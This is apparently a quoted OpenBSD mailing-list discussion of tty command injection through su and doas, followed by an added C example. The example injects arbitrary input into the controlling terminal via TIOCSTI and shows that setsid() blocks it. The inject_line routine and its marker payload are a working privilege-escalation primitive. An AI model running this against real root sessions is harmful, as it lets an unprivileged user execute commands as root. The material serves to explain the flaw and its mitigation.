> > I stumbled upon unexpected behavior on OpenBSD 6.0 (all patches)
> > which seems to allow running commands as the original user when
> > using su and doas interactively because the controlling terminal
> > is the same.
> 
> > Is this behavior expected and if so, how do I run commands from
> > root as an untrusted user? It's not mentioned in the man page
> > that using su/doas as root might allow other users to run code as
> > root.
> 
> Oh, interesting. The main design of doas is to escalate privileges, allowing
> users to run commands as root. But it certainly looks appealing to use it to
> drop privileges as well.
> 
> It's easy to add an option to disassociate from the controlling tty. I'm not
> sure if this solves every problem, but it certainly blocks direct tty
> injection. (You also pick up some privileges from being in a session or
> process group, but those privileges are less powerful.)
> 
> Certain commands require a controlling tty, but that seems to be mostly
> shells. Even vi and mg work ok.

People (and programs) are not used to operating without a tty
association; furthermore, study of failure conditions becomes really
difficult.

I don't see a way that -D can be used correctly.  I suspect it will
not be used when it is needed; and it will be used when it causes more
harm than good.

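The "direct tty injection" discussed above, and the effect of disassociating
from the controlling tty, as an added example (this is not code from the
thread or from doas itself). It assumes two things the thread does not
state: that the injection path is the TIOCSTI ioctl, which queues bytes into
a terminal's input as though typed, so a process started as an untrusted user
via "su" or "doas -u user" from a root shell can feed commands to that root
shell through the shared /dev/tty; and that an option like the proposed -D
would implement "disassociate" with setsid(), which gives the child a fresh
session with no controlling terminal. The payload string is constructed and
never reaches a terminal in the detached case; the #ifdef guard covers
kernels that no longer provide TIOCSTI.

```c
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <sys/ioctl.h>
#include <sys/wait.h>
#include <unistd.h>

/* Push one line into the caller's controlling terminal input queue using
 * TIOCSTI (assumed injection mechanism). Each byte is delivered as if typed,
 * so whichever process is reading that tty (e.g. the root shell that ran
 * "su user") receives and executes it. Returns 0 on success, -1 with errno
 * set when there is no controlling tty or TIOCSTI is unavailable. */
int inject_line(const char *line)
{
#ifdef TIOCSTI
    /* /dev/tty only resolves when the process has a controlling terminal;
     * after setsid() this open fails (ENXIO). */
    int fd = open("/dev/tty", O_RDWR);
    if (fd < 0)
        return -1;
    for (const char *p = line; *p != '\0'; p++) {
        if (ioctl(fd, TIOCSTI, p) < 0) {
            int saved = errno;
            close(fd);
            errno = saved;
            return -1;
        }
    }
    close(fd);
    return 0;
#else
    (void)line;
    errno = ENOTSUP;   /* kernel has removed TIOCSTI */
    return -1;
#endif
}

/* Model the -D style mitigation: fork a child, detach it from the controlling
 * tty with setsid(), and have it attempt an injection. Returns 1 when the
 * detached child could not reach /dev/tty (injection blocked), 0 otherwise. */
int injection_blocked_when_detached(void)
{
    pid_t pid = fork();
    if (pid < 0)
        return 0;
    if (pid == 0) {
        /* A freshly forked child is never a process-group leader, so
         * setsid() cannot fail with EPERM; the new session has no
         * controlling terminal. */
        if (setsid() < 0)
            _exit(2);
        /* Constructed payload: harmless here, because the open of /dev/tty
         * fails before any byte is queued. */
        _exit(inject_line("id > /tmp/owned\n") < 0 ? 0 : 1);
    }
    int status = 0;
    if (waitpid(pid, &status, 0) < 0)
        return 0;
    return (WIFEXITED(status) && WEXITSTATUS(status) == 0) ? 1 : 0;
}

int main(int argc, char **argv)
{
    /* With an argument, demonstrate the un-detached case: run this from a
     * shell that shares your tty and the line shows up as typed input, e.g.
     *   ./tty_inject 'echo injected'  */
    if (argc > 1) {
        if (inject_line(argv[1]) < 0)
            perror("inject_line");
        else
            printf("queued %zu bytes into the controlling tty\n",
                   (size_t)0 + __builtin_strlen(argv[1]));
    }
    printf("injection blocked after setsid(): %s\n",
           injection_blocked_when_detached() ? "yes" : "no");
    return 0;
}
```

The detached child fails at open("/dev/tty"), not at the ioctl, which is the
point of the option: once the session is new there is no controlling
terminal to inject into. The cost is the one the reply above raises, namely
that anything which needs a controlling tty (interactive shells, job
control) no longer has one.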